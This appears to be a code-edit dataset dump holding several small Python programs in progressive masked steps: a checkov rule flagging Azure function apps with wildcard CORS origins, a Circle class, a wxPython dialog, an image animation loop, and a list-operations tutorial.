missing_attribute_result=CheckResult.PASSED)
<|reserved_special_token_0|>
def get_forbidden_values(self):
return [['*']]
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class FunctionAppDisallowCORS(BaseResourceNegativeValueCheck):
def __init__(self):
name = 'Ensure function apps are not accessible from all regions'
id = 'CKV_AZURE_62'
supported_resources = ['azurerm_function_app']
categories = [CheckCategories.GENERAL_SECURITY]
super().__init__(name=name, id=id, categories=categories,
supported_resources=supported_resources,
missing_attribute_result=CheckResult.PASSED)
def get_inspected_key(self):
return 'site_config/[0]/cors/[0]/allowed_origins'
def get_forbidden_values(self):
return [['*']]
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class FunctionAppDisallowCORS(BaseResourceNegativeValueCheck):
def __init__(self):
name = 'Ensure function apps are not accessible from all regions'
id = 'CKV_AZURE_62'
supported_resources = ['azurerm_function_app']
categories = [CheckCategories.GENERAL_SECURITY]
super().__init__(name=name, id=id, categories=categories,
supported_resources=supported_resources,
missing_attribute_result=CheckResult.PASSED)
def get_inspected_key(self):
return 'site_config/[0]/cors/[0]/allowed_origins'
def get_forbidden_values(self):
return [['*']]
check = FunctionAppDisallowCORS()
<|reserved_special_token_1|>
from checkov.common.models.enums import CheckCategories, CheckResult
from checkov.terraform.checks.resource.base_resource_negative_value_check import BaseResourceNegativeValueCheck
class FunctionAppDisallowCORS(BaseResourceNegativeValueCheck):
def __init__(self):
name = 'Ensure function apps are not accessible from all regions'
id = 'CKV_AZURE_62'
supported_resources = ['azurerm_function_app']
categories = [CheckCategories.GENERAL_SECURITY]
super().__init__(name=name, id=id, categories=categories,
supported_resources=supported_resources,
missing_attribute_result=CheckResult.PASSED)
def get_inspected_key(self):
return 'site_config/[0]/cors/[0]/allowed_origins'
def get_forbidden_values(self):
return [['*']]
check = FunctionAppDisallowCORS()
<|reserved_special_token_1|>
from checkov.common.models.enums import CheckCategories, CheckResult
from checkov.terraform.checks.resource.base_resource_negative_value_check import BaseResourceNegativeValueCheck
class FunctionAppDisallowCORS(BaseResourceNegativeValueCheck):
def __init__(self):
name = "Ensure function apps are not accessible from all regions"
id = "CKV_AZURE_62"
supported_resources = ['azurerm_function_app']
categories = [CheckCategories.GENERAL_SECURITY]
super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources, missing_attribute_result=CheckResult.PASSED)
def get_inspected_key(self):
return 'site_config/[0]/cors/[0]/allowed_origins'
def get_forbidden_values(self):
return [['*']]
check = FunctionAppDisallowCORS()
|
flexible
|
{
"blob_id": "30c2d46d6587df3cbc3e83ecb7af787fcd86eb1f",
"index": 7067,
"step-1": "<mask token>\n\n\nclass FunctionAppDisallowCORS(BaseResourceNegativeValueCheck):\n\n def __init__(self):\n name = 'Ensure function apps are not accessible from all regions'\n id = 'CKV_AZURE_62'\n supported_resources = ['azurerm_function_app']\n categories = [CheckCategories.GENERAL_SECURITY]\n super().__init__(name=name, id=id, categories=categories,\n supported_resources=supported_resources,\n missing_attribute_result=CheckResult.PASSED)\n <mask token>\n\n def get_forbidden_values(self):\n return [['*']]\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass FunctionAppDisallowCORS(BaseResourceNegativeValueCheck):\n\n def __init__(self):\n name = 'Ensure function apps are not accessible from all regions'\n id = 'CKV_AZURE_62'\n supported_resources = ['azurerm_function_app']\n categories = [CheckCategories.GENERAL_SECURITY]\n super().__init__(name=name, id=id, categories=categories,\n supported_resources=supported_resources,\n missing_attribute_result=CheckResult.PASSED)\n\n def get_inspected_key(self):\n return 'site_config/[0]/cors/[0]/allowed_origins'\n\n def get_forbidden_values(self):\n return [['*']]\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass FunctionAppDisallowCORS(BaseResourceNegativeValueCheck):\n\n def __init__(self):\n name = 'Ensure function apps are not accessible from all regions'\n id = 'CKV_AZURE_62'\n supported_resources = ['azurerm_function_app']\n categories = [CheckCategories.GENERAL_SECURITY]\n super().__init__(name=name, id=id, categories=categories,\n supported_resources=supported_resources,\n missing_attribute_result=CheckResult.PASSED)\n\n def get_inspected_key(self):\n return 'site_config/[0]/cors/[0]/allowed_origins'\n\n def get_forbidden_values(self):\n return [['*']]\n\n\ncheck = FunctionAppDisallowCORS()\n",
"step-4": "from checkov.common.models.enums import CheckCategories, CheckResult\nfrom checkov.terraform.checks.resource.base_resource_negative_value_check import BaseResourceNegativeValueCheck\n\n\nclass FunctionAppDisallowCORS(BaseResourceNegativeValueCheck):\n\n def __init__(self):\n name = 'Ensure function apps are not accessible from all regions'\n id = 'CKV_AZURE_62'\n supported_resources = ['azurerm_function_app']\n categories = [CheckCategories.GENERAL_SECURITY]\n super().__init__(name=name, id=id, categories=categories,\n supported_resources=supported_resources,\n missing_attribute_result=CheckResult.PASSED)\n\n def get_inspected_key(self):\n return 'site_config/[0]/cors/[0]/allowed_origins'\n\n def get_forbidden_values(self):\n return [['*']]\n\n\ncheck = FunctionAppDisallowCORS()\n",
"step-5": "from checkov.common.models.enums import CheckCategories, CheckResult\nfrom checkov.terraform.checks.resource.base_resource_negative_value_check import BaseResourceNegativeValueCheck\n\n\nclass FunctionAppDisallowCORS(BaseResourceNegativeValueCheck):\n def __init__(self):\n name = \"Ensure function apps are not accessible from all regions\"\n id = \"CKV_AZURE_62\"\n supported_resources = ['azurerm_function_app']\n categories = [CheckCategories.GENERAL_SECURITY]\n super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources, missing_attribute_result=CheckResult.PASSED)\n\n def get_inspected_key(self):\n return 'site_config/[0]/cors/[0]/allowed_origins'\n\n def get_forbidden_values(self):\n return [['*']]\n\n\ncheck = FunctionAppDisallowCORS()\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
class Circle():
def __init__(self, radius, color="white"):
self.radius = radius
self.color = color
c1 = Circle(10, "black")
print("半径:{}, 色: {}".format(c1.radius, c1.color))
|
normal
|
{
"blob_id": "6ce50552571594c7be77ac0bf3b5274f2f39e545",
"index": 5086,
"step-1": "class Circle:\n <mask token>\n\n\n<mask token>\n",
"step-2": "class Circle:\n\n def __init__(self, radius, color='white'):\n self.radius = radius\n self.color = color\n\n\n<mask token>\n",
"step-3": "class Circle:\n\n def __init__(self, radius, color='white'):\n self.radius = radius\n self.color = color\n\n\n<mask token>\nprint('半径:{}, 色: {}'.format(c1.radius, c1.color))\n",
"step-4": "class Circle:\n\n def __init__(self, radius, color='white'):\n self.radius = radius\n self.color = color\n\n\nc1 = Circle(10, 'black')\nprint('半径:{}, 色: {}'.format(c1.radius, c1.color))\n",
"step-5": "class Circle():\n def __init__(self, radius, color=\"white\"):\n self.radius = radius\n self.color = color\n \nc1 = Circle(10, \"black\")\nprint(\"半径:{}, 色: {}\".format(c1.radius, c1.color))",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# staticbox.py
import wx
class StaticBox(wx.Dialog):
def __init__(self, parent, id, title):
wx.Dialog.__init__(self, parent, id, title, size = (250, 230))
wx.StaticBox(self, -1, 'Personal Info', (5, 5), size = (240, 170))
wx.CheckBox(self, -1, 'Male', (15, 30))
wx.CheckBox(self, -1, 'Married', (15, 55))
wx.StaticText(self, -1, 'Age', (15, 95))
wx.SpinCtrl(self, -1, '1', (55, 90), (60, -1), min = 1, max = 120)
wx.Button(self, 1, 'Ok', (90, 185), (60, -1))
self.Bind(wx.EVT_BUTTON, self.OnClose, id = 1)
self.Center()
self.ShowModal()
self.Destroy()
def OnClose(self, event):
self.Close()
if __name__ == '__main__':
app = wx.App()
StaticBox(None, -1, 'staticbox.py')
app.MainLoop()
|
normal
|
{
"blob_id": "96bf6220bfc884e3a19f70a63d9ecba449e2e7e2",
"index": 6108,
"step-1": "<mask token>\n\n\nclass StaticBox(wx.Dialog):\n <mask token>\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass StaticBox(wx.Dialog):\n\n def __init__(self, parent, id, title):\n wx.Dialog.__init__(self, parent, id, title, size=(250, 230))\n wx.StaticBox(self, -1, 'Personal Info', (5, 5), size=(240, 170))\n wx.CheckBox(self, -1, 'Male', (15, 30))\n wx.CheckBox(self, -1, 'Married', (15, 55))\n wx.StaticText(self, -1, 'Age', (15, 95))\n wx.SpinCtrl(self, -1, '1', (55, 90), (60, -1), min=1, max=120)\n wx.Button(self, 1, 'Ok', (90, 185), (60, -1))\n self.Bind(wx.EVT_BUTTON, self.OnClose, id=1)\n self.Center()\n self.ShowModal()\n self.Destroy()\n\n def OnClose(self, event):\n self.Close()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass StaticBox(wx.Dialog):\n\n def __init__(self, parent, id, title):\n wx.Dialog.__init__(self, parent, id, title, size=(250, 230))\n wx.StaticBox(self, -1, 'Personal Info', (5, 5), size=(240, 170))\n wx.CheckBox(self, -1, 'Male', (15, 30))\n wx.CheckBox(self, -1, 'Married', (15, 55))\n wx.StaticText(self, -1, 'Age', (15, 95))\n wx.SpinCtrl(self, -1, '1', (55, 90), (60, -1), min=1, max=120)\n wx.Button(self, 1, 'Ok', (90, 185), (60, -1))\n self.Bind(wx.EVT_BUTTON, self.OnClose, id=1)\n self.Center()\n self.ShowModal()\n self.Destroy()\n\n def OnClose(self, event):\n self.Close()\n\n\nif __name__ == '__main__':\n app = wx.App()\n StaticBox(None, -1, 'staticbox.py')\n app.MainLoop()\n",
"step-4": "import wx\n\n\nclass StaticBox(wx.Dialog):\n\n def __init__(self, parent, id, title):\n wx.Dialog.__init__(self, parent, id, title, size=(250, 230))\n wx.StaticBox(self, -1, 'Personal Info', (5, 5), size=(240, 170))\n wx.CheckBox(self, -1, 'Male', (15, 30))\n wx.CheckBox(self, -1, 'Married', (15, 55))\n wx.StaticText(self, -1, 'Age', (15, 95))\n wx.SpinCtrl(self, -1, '1', (55, 90), (60, -1), min=1, max=120)\n wx.Button(self, 1, 'Ok', (90, 185), (60, -1))\n self.Bind(wx.EVT_BUTTON, self.OnClose, id=1)\n self.Center()\n self.ShowModal()\n self.Destroy()\n\n def OnClose(self, event):\n self.Close()\n\n\nif __name__ == '__main__':\n app = wx.App()\n StaticBox(None, -1, 'staticbox.py')\n app.MainLoop()\n",
"step-5": "#!/usr/bin/env python \n# -*- coding: utf-8 -*- \n\n# staticbox.py\n\nimport wx\n\nclass StaticBox(wx.Dialog):\n def __init__(self, parent, id, title):\n wx.Dialog.__init__(self, parent, id, title, size = (250, 230))\n\n wx.StaticBox(self, -1, 'Personal Info', (5, 5), size = (240, 170))\n wx.CheckBox(self, -1, 'Male', (15, 30))\n wx.CheckBox(self, -1, 'Married', (15, 55))\n wx.StaticText(self, -1, 'Age', (15, 95))\n wx.SpinCtrl(self, -1, '1', (55, 90), (60, -1), min = 1, max = 120)\n wx.Button(self, 1, 'Ok', (90, 185), (60, -1))\n\n self.Bind(wx.EVT_BUTTON, self.OnClose, id = 1)\n\n self.Center()\n self.ShowModal()\n self.Destroy()\n\n def OnClose(self, event):\n self.Close()\n\nif __name__ == '__main__':\n app = wx.App()\n StaticBox(None, -1, 'staticbox.py')\n app.MainLoop()\n",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def animationDisplay():
matrix.Clear()
sonicRun = 0
sonicFrame = 0
y = 0
while y < 70:
sonicFrame = 0
if sonicRun >= 100:
sonicRun = 0
y = y + 15
while sonicFrame < 8:
animationFrame = 'animation/SonicRun-' + str(sonicFrame) + '.jpg'
imageDisplay(animationFrame, sonicRun, y)
time.sleep(0.05)
sonicRun = sonicRun + 6
sonicFrame = sonicFrame + 1
<|reserved_special_token_1|>
<|reserved_special_token_0|>
from runImages import *
def animationDisplay():
matrix.Clear()
sonicRun = 0
sonicFrame = 0
y = 0
while y < 70:
sonicFrame = 0
if sonicRun >= 100:
sonicRun = 0
y = y + 15
while sonicFrame < 8:
animationFrame = 'animation/SonicRun-' + str(sonicFrame) + '.jpg'
imageDisplay(animationFrame, sonicRun, y)
time.sleep(0.05)
sonicRun = sonicRun + 6
sonicFrame = sonicFrame + 1
<|reserved_special_token_1|>
"""
This is the hourly animation program. It displays a series of images across the board.
It is hard coded to work with the Sonic images. Adjustments would need to be made to
the y values which are distance traveled. Change sonicFrame < 8 value to the total
number of frames the new animation has.
"""
from runImages import *
def animationDisplay():
matrix.Clear()
sonicRun = 0
sonicFrame = 0
y = 0
while y < 70:
sonicFrame = 0
if sonicRun >= 100:
sonicRun = 0
y = y + 15
while sonicFrame < 8:
animationFrame = 'animation/SonicRun-' + str(sonicFrame) + '.jpg'
imageDisplay(animationFrame, sonicRun, y)
time.sleep(0.05)
sonicRun = sonicRun + 6
sonicFrame = sonicFrame + 1
|
flexible
|
{
"blob_id": "ede675c971ed233e93c14aa4d2ffb66fe7ba775a",
"index": 5613,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef animationDisplay():\n matrix.Clear()\n sonicRun = 0\n sonicFrame = 0\n y = 0\n while y < 70:\n sonicFrame = 0\n if sonicRun >= 100:\n sonicRun = 0\n y = y + 15\n while sonicFrame < 8:\n animationFrame = 'animation/SonicRun-' + str(sonicFrame) + '.jpg'\n imageDisplay(animationFrame, sonicRun, y)\n time.sleep(0.05)\n sonicRun = sonicRun + 6\n sonicFrame = sonicFrame + 1\n",
"step-3": "<mask token>\nfrom runImages import *\n\n\ndef animationDisplay():\n matrix.Clear()\n sonicRun = 0\n sonicFrame = 0\n y = 0\n while y < 70:\n sonicFrame = 0\n if sonicRun >= 100:\n sonicRun = 0\n y = y + 15\n while sonicFrame < 8:\n animationFrame = 'animation/SonicRun-' + str(sonicFrame) + '.jpg'\n imageDisplay(animationFrame, sonicRun, y)\n time.sleep(0.05)\n sonicRun = sonicRun + 6\n sonicFrame = sonicFrame + 1\n",
"step-4": "\"\"\"\nThis is the hourly animation program. It displays a series of images across the board.\nIt is hard coded to work with the Sonic images. Adjustments would need to be made to\nthe y values which are distance traveled. Change sonicFrame < 8 value to the total\nnumber of frames the new animation has.\n\"\"\"\nfrom runImages import *\n\ndef animationDisplay():\n matrix.Clear()\n sonicRun = 0\n sonicFrame = 0\n y = 0\n while y < 70:\n sonicFrame = 0\n if sonicRun >= 100:\n sonicRun = 0\n y = y + 15\n while sonicFrame < 8:\n animationFrame = 'animation/SonicRun-' + str(sonicFrame) + '.jpg'\n imageDisplay(animationFrame, sonicRun, y)\n time.sleep(0.05)\n sonicRun = sonicRun + 6\n sonicFrame = sonicFrame + 1\n\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
def get_len_count_index_list():
print('=== get_len_count_index_list ===')
l = ['a', 'b', 'c', 'd', 'e', 'e']
print(l[0])
print('len: {}'.format(len(l)))
print('count d: {}'.format(l.count('d')))
print('count e: {}'.format(l.count('e')))
print('count f: {}'.format(l.count('f')))
print('index d: {}'.format(l.index('d')))
print('index e: {}'.format(l.index('e')))
def sort_reverse_list():
print('=== sort_reverse_list ===')
l = ['e', 'b', 'c', 'a', 'f', 'd']
print(l)
print(l.sort())
print(l)
l.sort(cmp=lambda x, y: -cmp(x, y))
print(l)
print(l.reverse())
print(l)
print(list(reversed(l)))
print(l)
def _sort_func(x):
return x[0] + x[1]
def sort_list():
print('=== sort_list ===')
l = [(1, 2), (3, 1), (2, 3)]
print(sorted(l, key=lambda x: x[1]))
print(sorted(l, key=lambda x: x[0]))
print(sorted(l, key=_sort_func))
def list_index():
print('=== list_index ===')
l = ['a', 'b', 'c']
print(l.index('a'))
def list_slice():
print('=== list_slice ===')
l = [1, 2, 3]
print(l[:1])
print(l[:5])
print(l[-1:])
print(l[-5:])
print(l[:-1])
print(l[10:20])
ls = l[:1]
ls[0] = 2
print(ls)
print(l)
def list_slice_with_step():
print('=== list_slice_with_step ===')
l = list(range(20))
print(l[::3])
print(l[1::3])
print(l[2::3])
print(l[::-1])
l[::3] = [0, 0, 0, 0, 0, 0, 0]
print(l)
del l[::3]
print(l)
def list_comprehension():
print('=== list_comprehension ===')
l = [(i * i) for i in range(3)]
print(l)
def test_insert_when_traversing():
print('=== test_insert_when_traversing ===')
l = [3, 4]
for i in l:
l.insert(0, -i)
print(i)
def main():
list_slice()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def insert_append_and_extend_list():
print('=== insert_append_and_extend_list ===')
l = ['e', 'h']
l.insert(-1, 'g')
print(l)
l.insert(1, 'f')
print(l)
l.insert(0, 'd')
print(l)
l.insert(10, 'i')
print(l)
l.append('l')
print(l)
l.extend(['m', 'n'])
print(l)
l[0:0] = ['b', 'c']
print(l)
l = ['a'] + l
print(l)
<|reserved_special_token_0|>
def get_len_count_index_list():
print('=== get_len_count_index_list ===')
l = ['a', 'b', 'c', 'd', 'e', 'e']
print(l[0])
print('len: {}'.format(len(l)))
print('count d: {}'.format(l.count('d')))
print('count e: {}'.format(l.count('e')))
print('count f: {}'.format(l.count('f')))
print('index d: {}'.format(l.index('d')))
print('index e: {}'.format(l.index('e')))
def sort_reverse_list():
print('=== sort_reverse_list ===')
l = ['e', 'b', 'c', 'a', 'f', 'd']
print(l)
print(l.sort())
print(l)
l.sort(cmp=lambda x, y: -cmp(x, y))
print(l)
print(l.reverse())
print(l)
print(list(reversed(l)))
print(l)
def _sort_func(x):
return x[0] + x[1]
def sort_list():
print('=== sort_list ===')
l = [(1, 2), (3, 1), (2, 3)]
print(sorted(l, key=lambda x: x[1]))
print(sorted(l, key=lambda x: x[0]))
print(sorted(l, key=_sort_func))
def list_index():
print('=== list_index ===')
l = ['a', 'b', 'c']
print(l.index('a'))
def list_slice():
print('=== list_slice ===')
l = [1, 2, 3]
print(l[:1])
print(l[:5])
print(l[-1:])
print(l[-5:])
print(l[:-1])
print(l[10:20])
ls = l[:1]
ls[0] = 2
print(ls)
print(l)
def list_slice_with_step():
print('=== list_slice_with_step ===')
l = list(range(20))
print(l[::3])
print(l[1::3])
print(l[2::3])
print(l[::-1])
l[::3] = [0, 0, 0, 0, 0, 0, 0]
print(l)
del l[::3]
print(l)
def list_comprehension():
print('=== list_comprehension ===')
l = [(i * i) for i in range(3)]
print(l)
def test_insert_when_traversing():
print('=== test_insert_when_traversing ===')
l = [3, 4]
for i in l:
l.insert(0, -i)
print(i)
def main():
list_slice()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def insert_append_and_extend_list():
print('=== insert_append_and_extend_list ===')
l = ['e', 'h']
l.insert(-1, 'g')
print(l)
l.insert(1, 'f')
print(l)
l.insert(0, 'd')
print(l)
l.insert(10, 'i')
print(l)
l.append('l')
print(l)
l.extend(['m', 'n'])
print(l)
l[0:0] = ['b', 'c']
print(l)
l = ['a'] + l
print(l)
def remove_pop_list():
print('=== remove_pop_list ===')
l = ['a', 'b', 'c', 'd', 'e', 'e']
print(l)
print('l.remove: {}'.format(l.remove('e')))
print(l)
if 'h' in l:
l.remove('h')
l.pop()
print(l)
l.pop(1)
print('l.pop: {}'.format(l.pop(1)))
print(l)
def get_len_count_index_list():
print('=== get_len_count_index_list ===')
l = ['a', 'b', 'c', 'd', 'e', 'e']
print(l[0])
print('len: {}'.format(len(l)))
print('count d: {}'.format(l.count('d')))
print('count e: {}'.format(l.count('e')))
print('count f: {}'.format(l.count('f')))
print('index d: {}'.format(l.index('d')))
print('index e: {}'.format(l.index('e')))
def sort_reverse_list():
print('=== sort_reverse_list ===')
l = ['e', 'b', 'c', 'a', 'f', 'd']
print(l)
print(l.sort())
print(l)
l.sort(cmp=lambda x, y: -cmp(x, y))
print(l)
print(l.reverse())
print(l)
print(list(reversed(l)))
print(l)
def _sort_func(x):
return x[0] + x[1]
def sort_list():
print('=== sort_list ===')
l = [(1, 2), (3, 1), (2, 3)]
print(sorted(l, key=lambda x: x[1]))
print(sorted(l, key=lambda x: x[0]))
print(sorted(l, key=_sort_func))
def list_index():
print('=== list_index ===')
l = ['a', 'b', 'c']
print(l.index('a'))
def list_slice():
print('=== list_slice ===')
l = [1, 2, 3]
print(l[:1])
print(l[:5])
print(l[-1:])
print(l[-5:])
print(l[:-1])
print(l[10:20])
ls = l[:1]
ls[0] = 2
print(ls)
print(l)
def list_slice_with_step():
print('=== list_slice_with_step ===')
l = list(range(20))
print(l[::3])
print(l[1::3])
print(l[2::3])
print(l[::-1])
l[::3] = [0, 0, 0, 0, 0, 0, 0]
print(l)
del l[::3]
print(l)
def list_comprehension():
print('=== list_comprehension ===')
l = [(i * i) for i in range(3)]
print(l)
def test_insert_when_traversing():
print('=== test_insert_when_traversing ===')
l = [3, 4]
for i in l:
l.insert(0, -i)
print(i)
def main():
list_slice()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def init_list():
print('=== init_list ===')
l = list()
print(l)
l2 = []
print(l2)
l3 = list((1, 2))
print(l3)
l4 = [1, 2]
print(l4)
def insert_append_and_extend_list():
print('=== insert_append_and_extend_list ===')
l = ['e', 'h']
l.insert(-1, 'g')
print(l)
l.insert(1, 'f')
print(l)
l.insert(0, 'd')
print(l)
l.insert(10, 'i')
print(l)
l.append('l')
print(l)
l.extend(['m', 'n'])
print(l)
l[0:0] = ['b', 'c']
print(l)
l = ['a'] + l
print(l)
def remove_pop_list():
print('=== remove_pop_list ===')
l = ['a', 'b', 'c', 'd', 'e', 'e']
print(l)
print('l.remove: {}'.format(l.remove('e')))
print(l)
if 'h' in l:
l.remove('h')
l.pop()
print(l)
l.pop(1)
print('l.pop: {}'.format(l.pop(1)))
print(l)
def get_len_count_index_list():
print('=== get_len_count_index_list ===')
l = ['a', 'b', 'c', 'd', 'e', 'e']
print(l[0])
print('len: {}'.format(len(l)))
print('count d: {}'.format(l.count('d')))
print('count e: {}'.format(l.count('e')))
print('count f: {}'.format(l.count('f')))
print('index d: {}'.format(l.index('d')))
print('index e: {}'.format(l.index('e')))
def sort_reverse_list():
print('=== sort_reverse_list ===')
l = ['e', 'b', 'c', 'a', 'f', 'd']
print(l)
print(l.sort())
print(l)
l.sort(cmp=lambda x, y: -cmp(x, y))
print(l)
print(l.reverse())
print(l)
print(list(reversed(l)))
print(l)
def _sort_func(x):
return x[0] + x[1]
def sort_list():
print('=== sort_list ===')
l = [(1, 2), (3, 1), (2, 3)]
print(sorted(l, key=lambda x: x[1]))
print(sorted(l, key=lambda x: x[0]))
print(sorted(l, key=_sort_func))
def list_index():
print('=== list_index ===')
l = ['a', 'b', 'c']
print(l.index('a'))
def list_slice():
print('=== list_slice ===')
l = [1, 2, 3]
print(l[:1])
print(l[:5])
print(l[-1:])
print(l[-5:])
print(l[:-1])
print(l[10:20])
ls = l[:1]
ls[0] = 2
print(ls)
print(l)
def list_slice_with_step():
print('=== list_slice_with_step ===')
l = list(range(20))
print(l[::3])
print(l[1::3])
print(l[2::3])
print(l[::-1])
l[::3] = [0, 0, 0, 0, 0, 0, 0]
print(l)
del l[::3]
print(l)
def list_comprehension():
print('=== list_comprehension ===')
l = [(i * i) for i in range(3)]
print(l)
def test_insert_when_traversing():
print('=== test_insert_when_traversing ===')
l = [3, 4]
for i in l:
l.insert(0, -i)
print(i)
def main():
list_slice()
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
# coding: utf-8
def init_list():
print("=== init_list ===")
l = list()
print(l)
l2 = []
print(l2)
l3 = list((1, 2))
print(l3)
l4 = [1, 2]
print(l4)
def insert_append_and_extend_list():
print("=== insert_append_and_extend_list ===")
l = ['e', 'h']
l.insert(-1, 'g')
print(l)
l.insert(1, 'f')
print(l)
l.insert(0, 'd')
print(l)
l.insert(10, 'i')
print(l)
l.append('l')
print(l)
l.extend(['m', 'n'])
print(l)
l[0:0] = ['b', 'c']
print(l)
l = ['a'] + l
print(l)
def remove_pop_list():
print("=== remove_pop_list ===")
l = ['a', 'b', 'c', 'd', 'e', 'e']
print(l)
print('l.remove: {}'.format(l.remove('e'))) # 只删除第一次出现的,没有返回
print(l)
# l.remove('h') # 删除不存在的会导致 ValueError
if 'h' in l:
l.remove('h')
l.pop()
print(l)
l.pop(1)
print('l.pop: {}'.format(l.pop(1)))
print(l)
# l.pop(10) # IndexError: pop index out of range
def get_len_count_index_list():
print("=== get_len_count_index_list ===")
l = ['a', 'b', 'c', 'd', 'e', 'e']
print(l[0])
# l[10] = 'z' # IndexError: list index out of range
# print(l[10]) # IndexError: list index out of range
# print(l.get(10)) # 'list' object has no attribute 'get'
print('len: {}'.format(len(l)))
print('count d: {}'.format(l.count('d')))
print('count e: {}'.format(l.count('e')))
print('count f: {}'.format(l.count('f')))
print('index d: {}'.format(l.index('d')))
print('index e: {}'.format(l.index('e')))
# print('index f: {}'.format(l.index('f'))) # ValueError: 'f' is not in list
def sort_reverse_list():
print("=== sort_reverse_list ===")
l = ['e', 'b', 'c', 'a', 'f', 'd']
print(l)
print(l.sort()) # return None
print(l)
l.sort(cmp=lambda x, y: -(cmp(x, y)))
print(l)
print(l.reverse()) # return None
print(l)
print(list(reversed(l))) # return a reversed iterator
print(l)
def _sort_func(x):
return x[0] + x[1]
def sort_list():
print("=== sort_list ===")
l = [(1, 2), (3, 1), (2, 3)]
print(sorted(l, key=lambda x: x[1]))
print(sorted(l, key=lambda x: x[0]))
print(sorted(l, key=_sort_func))
def list_index():
print("=== list_index ===")
l = ['a', 'b', 'c']
print(l.index('a'))
def list_slice():
print("=== list_slice ===")
l = [1, 2, 3]
print(l[:1])
print(l[:5])
print(l[-1:])
print(l[-5:])
print(l[:-1])
print(l[10:20])
ls = l[:1]
ls[0] = 2
print(ls)
print(l) # 改变 ls 不会改变 l
def list_slice_with_step():
print("=== list_slice_with_step ===")
l = list(range(20))
print(l[::3])
print(l[1::3])
print(l[2::3])
print(l[::-1])
l[::3] = [0, 0, 0, 0, 0, 0, 0]
print(l)
del l[::3]
print(l)
def list_comprehension():
print("=== list_comprehension ===")
# 列表推导式
l = [i * i for i in range(3)]
print(l)
def test_insert_when_traversing():
print("=== test_insert_when_traversing ===")
l = [3, 4]
for i in l:
l.insert(0, -i)
print(i)
# 会停不下来
def main():
# init_list()
# insert_append_and_extend_list()
# remove_pop_list()
# get_len_count_index_list()
# sort_reverse_list()
# sort_list()
# list_index()
list_slice()
# list_slice_with_step()
# list_comprehension()
# test_insert_when_traversing()
if __name__ == '__main__':
main()
# https://www.tutorialspoint.com/python/python_lists.htm
# https://stackoverflow.com/a/9028088/3936457
# https://stackoverflow.com/questions/8785554/how-do-i-insert-a-list-at-the-front-of-another-list
|
flexible
|
{
"blob_id": "1a710916461644a0676a3bd84926aeabb2aa3f71",
"index": 7127,
"step-1": "<mask token>\n\n\ndef get_len_count_index_list():\n print('=== get_len_count_index_list ===')\n l = ['a', 'b', 'c', 'd', 'e', 'e']\n print(l[0])\n print('len: {}'.format(len(l)))\n print('count d: {}'.format(l.count('d')))\n print('count e: {}'.format(l.count('e')))\n print('count f: {}'.format(l.count('f')))\n print('index d: {}'.format(l.index('d')))\n print('index e: {}'.format(l.index('e')))\n\n\ndef sort_reverse_list():\n print('=== sort_reverse_list ===')\n l = ['e', 'b', 'c', 'a', 'f', 'd']\n print(l)\n print(l.sort())\n print(l)\n l.sort(cmp=lambda x, y: -cmp(x, y))\n print(l)\n print(l.reverse())\n print(l)\n print(list(reversed(l)))\n print(l)\n\n\ndef _sort_func(x):\n return x[0] + x[1]\n\n\ndef sort_list():\n print('=== sort_list ===')\n l = [(1, 2), (3, 1), (2, 3)]\n print(sorted(l, key=lambda x: x[1]))\n print(sorted(l, key=lambda x: x[0]))\n print(sorted(l, key=_sort_func))\n\n\ndef list_index():\n print('=== list_index ===')\n l = ['a', 'b', 'c']\n print(l.index('a'))\n\n\ndef list_slice():\n print('=== list_slice ===')\n l = [1, 2, 3]\n print(l[:1])\n print(l[:5])\n print(l[-1:])\n print(l[-5:])\n print(l[:-1])\n print(l[10:20])\n ls = l[:1]\n ls[0] = 2\n print(ls)\n print(l)\n\n\ndef list_slice_with_step():\n print('=== list_slice_with_step ===')\n l = list(range(20))\n print(l[::3])\n print(l[1::3])\n print(l[2::3])\n print(l[::-1])\n l[::3] = [0, 0, 0, 0, 0, 0, 0]\n print(l)\n del l[::3]\n print(l)\n\n\ndef list_comprehension():\n print('=== list_comprehension ===')\n l = [(i * i) for i in range(3)]\n print(l)\n\n\ndef test_insert_when_traversing():\n print('=== test_insert_when_traversing ===')\n l = [3, 4]\n for i in l:\n l.insert(0, -i)\n print(i)\n\n\ndef main():\n list_slice()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef insert_append_and_extend_list():\n print('=== insert_append_and_extend_list ===')\n l = ['e', 'h']\n l.insert(-1, 'g')\n print(l)\n l.insert(1, 'f')\n print(l)\n l.insert(0, 'd')\n print(l)\n l.insert(10, 'i')\n print(l)\n l.append('l')\n print(l)\n l.extend(['m', 'n'])\n print(l)\n l[0:0] = ['b', 'c']\n print(l)\n l = ['a'] + l\n print(l)\n\n\n<mask token>\n\n\ndef get_len_count_index_list():\n print('=== get_len_count_index_list ===')\n l = ['a', 'b', 'c', 'd', 'e', 'e']\n print(l[0])\n print('len: {}'.format(len(l)))\n print('count d: {}'.format(l.count('d')))\n print('count e: {}'.format(l.count('e')))\n print('count f: {}'.format(l.count('f')))\n print('index d: {}'.format(l.index('d')))\n print('index e: {}'.format(l.index('e')))\n\n\ndef sort_reverse_list():\n print('=== sort_reverse_list ===')\n l = ['e', 'b', 'c', 'a', 'f', 'd']\n print(l)\n print(l.sort())\n print(l)\n l.sort(cmp=lambda x, y: -cmp(x, y))\n 